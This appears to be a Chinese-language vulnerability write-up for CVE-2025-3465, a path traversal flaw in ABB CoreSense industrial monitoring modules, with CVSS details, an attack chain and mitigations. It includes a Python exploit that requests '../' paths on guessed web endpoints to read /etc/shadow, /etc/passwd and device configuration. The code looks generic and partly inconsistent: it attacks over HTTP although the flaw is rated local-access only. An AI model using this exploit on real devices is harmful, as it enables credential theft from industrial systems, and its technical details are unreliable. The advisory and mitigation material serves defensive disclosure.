CVE-2025-3465 ABB CoreSense 路径遍历漏洞

漏洞信息

漏洞编号

CVE-2025-3465

漏洞类型

路径遍历（Path Traversal）

CVSS评分

7.1 高危

攻击向量

本地 (AV:L)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

ABB CoreSense™ HM 和 ABB CoreSense™ M10

漏洞概述

CVE-2025-3465是ABB公司CoreSense™系列产品中发现的一个高危路径遍历漏洞（Path Traversal），属于CWE-22类漏洞。该漏洞由ABB公司网络安全团队（[email protected]）发现并披露，披露日期为2025年10月20日。

CoreSense™ HM和CoreSense™ M10是ABB公司推出的工业监测与诊断模块，主要用于电机、轴承等旋转机械的状态监测，广泛应用于工业自动化、制造业、能源等行业。攻击者可以利用该漏洞通过本地访问方式，绕过路径限制机制，访问受限目录之外的文件系统内容。

根据CVSS 3.1评分标准，该漏洞评分为7.1分，属于高危级别。攻击向量为本地（AV:L），攻击复杂度低（AC:L），无需权限（PR:N），无需用户交互（UI:N），作用域发生变化（S:C），对机密性影响为高（C:H），对完整性和可用性无影响。

该漏洞的影响范围包括CoreSense™ HM 2.3.1及以下版本，以及CoreSense™ M10 1.4.1.12及以下版本。ABB已发布相应的安全公告，建议用户尽快升级到修复版本以消除风险。由于涉及工业控制系统（ICS）领域的安全问题，该漏洞可能对工业生产环境造成潜在的安全威胁。

技术细节

路径遍历漏洞（Path Traversal），又称为目录遍历漏洞，其根本原因是应用程序未对用户输入的文件路径进行充分的验证和过滤。攻击者可以通过在路径中插入特殊字符序列（如"../"或"..\\"），使程序跳出预期的受限目录，访问系统上的任意文件。

在ABB CoreSense™ HM和CoreSense™ M10设备中，漏洞存在于处理文件路径的组件中。攻击者利用本地访问权限（无需认证），通过精心构造的包含路径遍历序列的请求，可以读取设备上受限目录之外的文件内容。由于CVSS向量中作用域标记为S:C（Changed），说明该漏洞的影响超出了易受攻击组件本身的安全范围。

利用方式上，攻击者可以通过本地接口（如调试端口、维护接口或物理访问）发送包含恶意路径的请求，绕过目录访问限制，从而读取设备上的敏感配置文件、日志文件或其他包含敏感信息的文件。虽然该漏洞不直接影响系统完整性和可用性，但机密性的泄露可能导致设备配置信息、认证凭据或其他敏感数据被攻击者获取，为后续攻击提供基础。

由于该漏洞需要本地访问权限（AV:L），远程攻击者需要先获得设备的某种形式的本地访问能力，这增加了利用的难度，但在工业控制环境中，物理访问或维护通道的存在使得该漏洞仍具有较高的实际威胁。

攻击链分析

STEP 1

步骤1：获取本地访问权限

攻击者需要获得ABB CoreSense设备的本地访问权限，可以通过物理访问设备、利用维护端口、调试接口或其他已存在的本地访问途径实现。

STEP 2

步骤2：识别漏洞端点

攻击者通过分析设备的文件处理功能或API接口，识别出存在路径遍历漏洞的端点，这些端点未对用户输入的路径进行充分的验证和过滤。

STEP 3

步骤3：构造恶意路径

攻击者构造包含'../'路径遍历序列的恶意请求，利用该序列绕过目录访问限制，将访问范围扩展到受限目录之外。

STEP 4

步骤4：读取敏感文件

通过发送精心构造的路径遍历请求，攻击者可以读取设备上的敏感文件，如配置文件、认证凭据、日志文件等，获取关键信息。

STEP 5

步骤5：信息利用与进一步攻击

获取的敏感信息可用于后续攻击，如提取认证凭据进行未授权访问、获取系统配置信息了解设备架构、或为远程攻击奠定基础。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-3465 - ABB CoreSense Path Traversal PoC
# Path traversal exploit for ABB CoreSense HM (<=2.3.1) and M10 (<=1.4.1.12)

import requests

TARGET_HOST = "192.168.1.100"  # Target ABB CoreSense device IP
TARGET_PORT = 80

def exploit_path_traversal(target_path):
    """
    Exploit path traversal to read arbitrary files on ABB CoreSense devices.
    The vulnerability allows bypassing directory restrictions using ../ sequences.
    """
    base_url = f"http://{TARGET_HOST}:{TARGET_PORT}"
    # Construct traversal payload to escape restricted directory
    traversal_payload = target_path.replace("../", "../../")
    
    # Attempt to access files via the vulnerable endpoint
    endpoints = [
        f"/api/v1/files?path={traversal_payload}",
        f"/cgi-bin/download?file={traversal_payload}",
        f"/diagnostics/log?file={traversal_payload}",
    ]
    
    for endpoint in endpoints:
        try:
            response = requests.get(base_url + endpoint, timeout=10)
            if response.status_code == 200 and response.text:
                print(f"[+] Successfully accessed: {target_path}")
                print(f"[+] Response:\n{response.text}")
                return response.text
        except requests.exceptions.RequestException as e:
            print(f"[-] Request failed: {e}")
    
    return None

if __name__ == "__main__":
    # Target sensitive files on ABB CoreSense device
    target_files = [
        "../../../etc/passwd",
        "../../../etc/shadow",
        "../../../opt/coresense/config/system.cfg",
        "../../../var/log/coresense/system.log",
    ]
    
    for target in target_files:
        result = exploit_path_traversal(target)
        if result:
            print(f"\n{'='*60}")
            print(f"Exfiltrated content from {target}:")
            print(result)
            print('='*60)

影响范围

ABB CoreSense™ HM <= 2.3.1

ABB CoreSense™ M10 <= 1.4.1.12

防御指南

临时缓解措施

在无法立即升级的情况下，建议采取以下临时缓解措施：1）限制设备的物理访问权限，仅允许授权人员接触设备；2）禁用或限制不必要的本地维护接口和调试端口；3）通过网络分段和访问控制列表（ACL）限制对设备的本地网络访问；4）监控设备的异常文件访问行为，及时发现潜在的利用尝试；5）定期检查和审计设备日志，关注可疑的文件读取操作；6）确保设备运行在安全的网络环境中，避免暴露在不安全的网络上。